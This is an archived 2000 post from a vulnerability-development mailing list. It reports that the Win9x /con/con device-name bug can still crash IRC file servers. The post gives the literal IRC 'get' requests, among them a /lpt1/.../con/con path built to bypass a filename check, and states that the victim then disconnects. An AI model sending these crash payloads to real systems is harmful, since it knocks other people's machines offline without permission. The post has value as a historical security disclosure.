Vulnerability Development mailing list archives

ADV: /con/con is yet exploitable on most fservs


From: prrar () NITNET COM BR (Paulo Ribeiro)
Date: Wed, 7 Jun 2000 15:56:56 -0300


The /dev/dev Win9x bug can be exploited on fservs at IRC. If you access
the fserv and try:

<hee> fserv...
<you> get /con/con

You may receive: hee has quit (Connection reset by peer) or <hee>
Invalid filename (or something like this). So, you may try: <you> get
/lpt1/lpt1/lpt1/lpt1/lpt1/lpt1/lpt1/lpt1/con/con

And you shall receive: hee has quit (Connection reset by peer)

Yours,
Paulo Ribeiro.


Current thread: